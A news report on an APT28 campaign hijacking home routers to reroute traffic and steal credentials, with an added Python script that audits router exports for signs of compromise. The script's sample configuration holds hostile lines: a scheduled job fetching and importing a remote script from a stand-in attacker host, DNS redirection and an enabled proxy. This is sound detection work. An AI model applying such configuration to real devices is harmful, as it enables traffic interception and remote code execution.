Russian state-backed hackers infiltrate thousands of home routers to steal login credentials
Russian government-linked hackers targeted thousands of home routers to steal passwords, raising global concerns over cybersecurity and network vulnerabilities.
A group of hackers linked to the Russian government has taken control of thousands of home and small-business routers worldwide as part of an ongoing campaign to reroute internet traffic and steal user credentials, according to warnings issued Tuesday by security researchers and government agencies.
The activity has been attributed to the long-established Russian hacking unit known as Fancy Bear, also referred to as APT28. The group has previously been associated with major cyber operations, including the 2016 breach of the Democratic National Committee and the 2022 cyberattack that disrupted satellite provider Viasat. The group is widely believed to operate under Russia’s military intelligence agency, the GRU.
According to findings released by the U.K.’s National Cyber Security Centre (NCSC) and Black Lotus Labs, the attackers exploited known vulnerabilities in routers manufactured by MikroTik and TP-Link. These vulnerabilities were already publicly disclosed, but many devices remained unpatched, making them easy targets.
Researchers reported that the campaign has allowed the hackers to monitor large numbers of individuals over several years by compromising routers that often run outdated software. In many cases, the device owners were unaware that their hardware had been breached.
The NCSC noted that the campaign appears opportunistic, with attackers targeting a broad pool of potential victims before focusing on individuals or organisations of particular intelligence value.
Once access to a router is gained, the attackers modify its configuration so that the victim's internet traffic is quietly routed through servers the attackers control. From that position they can redirect users to fraudulent websites that impersonate legitimate login pages and capture credentials and authentication tokens. Because the victim completes the real sign-in, including any second factor, the attacker only needs the resulting session token or cookie to use the account, so two-factor authentication does not block this kind of access.
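The configuration changes described above leave traces in the router's own settings, which is where a device owner or responder should look first. The script below is an added example, not code from the article, the NCSC, Black Lotus Labs or any vendor: it parses a RouterOS-style `/export` listing and flags the kinds of changes a traffic-redirecting implant would make (resolvers pointed at outside hosts, a proxy service switched on, a scheduled job that fetches and imports a remote script, a NAT rule that redirects DNS). The indicator list, the trusted-resolver allow-list and the sample export are all constructed assumptions for illustration, not indicators published for this campaign.

```python
"""Audit a RouterOS-style export for signs that a router has been repointed
at infrastructure the owner does not control.

Added example; not code from the article, the NCSC, Black Lotus Labs or any
vendor. The indicator checks are an assumption about how traffic redirection
typically shows up in a router configuration, and the sample export below is
constructed for this example.
"""
import shlex
from ipaddress import ip_address, ip_network

# Assumed allow-list: the resolvers the owner or ISP actually configured.
TRUSTED_RESOLVERS = {"192.0.2.53", "1.1.1.1", "8.8.8.8"}

# Private and loopback ranges: a resolver here is normally the ISP box or LAN.
PRIVATE_NETS = [ip_network(n) for n in
                ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

# Constructed sample of an export after a hypothetical compromise.
# 198.51.100.7 is documentation space standing in for attacker infrastructure.
SAMPLE_EXPORT = """\
# 2024-01-01 00:00:00 by RouterOS 6.42
/ip dns
set allow-remote-requests=yes servers=192.0.2.53,198.51.100.7
/ip socks
set enabled=yes port=5678
/ip proxy
set enabled=no
/system scheduler
add interval=1d name=upd on-event="/tool fetch url=http://198.51.100.7/u.rsc mode=http;/import u.rsc"
/ip firewall nat
add chain=dstnat dst-port=53 protocol=udp action=dst-nat to-addresses=198.51.100.7
"""


def is_private(addr: str) -> bool:
    """True if addr parses as an IP inside a private/loopback range."""
    try:
        ip = ip_address(addr)
    except ValueError:
        return False
    return any(ip in net for net in PRIVATE_NETS)


def parse_export(text: str):
    """Turn an export into (section, verb, {key: value}) tuples.

    Section headers start with '/'; command lines are 'set'/'add' followed by
    key=value pairs. shlex keeps quoted values (such as on-event scripts) whole.
    """
    section, entries = None, []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):
            section = line
            continue
        tokens = shlex.split(line)
        verb, kv = tokens[0], {}
        for tok in tokens[1:]:
            key, _, value = tok.partition("=")
            kv[key] = value
        entries.append((section, verb, kv))
    return entries


def audit(entries):
    """Return human-readable findings for redirection-style changes."""
    findings = []
    for section, verb, kv in entries:
        if section == "/ip dns" and "servers" in kv:
            for server in kv["servers"].split(","):
                if server not in TRUSTED_RESOLVERS and not is_private(server):
                    findings.append(f"dns: untrusted resolver {server}")
        elif section in ("/ip socks", "/ip proxy") and kv.get("enabled") == "yes":
            findings.append(f"{section[4:]}: proxy service enabled on port "
                            f"{kv.get('port', '?')}")
        elif section == "/system scheduler" and verb == "add":
            event = kv.get("on-event", "")
            if "fetch" in event or "import" in event:
                findings.append(f"scheduler: job {kv.get('name')!r} "
                                "fetches/imports a remote script")
        elif section == "/ip firewall nat" and kv.get("action") == "dst-nat":
            target = kv.get("to-addresses", "")
            if kv.get("dst-port") == "53" and target and not is_private(target):
                findings.append(f"nat: DNS (port 53) redirected to {target}")
    return findings


if __name__ == "__main__":
    for finding in audit(parse_export(SAMPLE_EXPORT)):
        print(finding)
```

On a real device, feed the script the output of `/export` and compare against a configuration backup taken before the device was exposed; a resolver, proxy or scheduler entry the owner never created is the finding, regardless of which address it points at. Consumer routers without a text export expose the same fields (DNS servers, remote management, port forwards) in their web interface, and the same questions apply.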
Black Lotus Labs estimated that at least 18,000 victims across approximately 120 countries have been affected. These include government agencies, law enforcement organisations, and email service providers in regions such as North Africa, Central America, and Southeast Asia.
Microsoft also released its own analysis of the campaign, stating that it had identified more than 200 organisations and approximately 5,000 consumer devices affected, including at least three government entities in Africa.
Authorities in the United States have taken action in response to the campaign. The Federal Bureau of Investigation is expected to announce the seizure of several domains used by the attackers. Lumen Technologies confirmed that it worked alongside a coalition, including the FBI, to disrupt the botnet infrastructure and take it offline.
Although the FBI did not provide immediate comment before publication, the US Department of Justice later confirmed that it had neutralised compromised routers located within the United States following court authorisation. According to the DOJ, the FBI deployed a set of commands to affected devices to gather evidence, reset configurations, and block further unauthorised access attempts.
The campaign highlights ongoing risks posed by unpatched network devices and underscores the importance of maintaining up-to-date firmware and security settings to prevent unauthorised intrusions.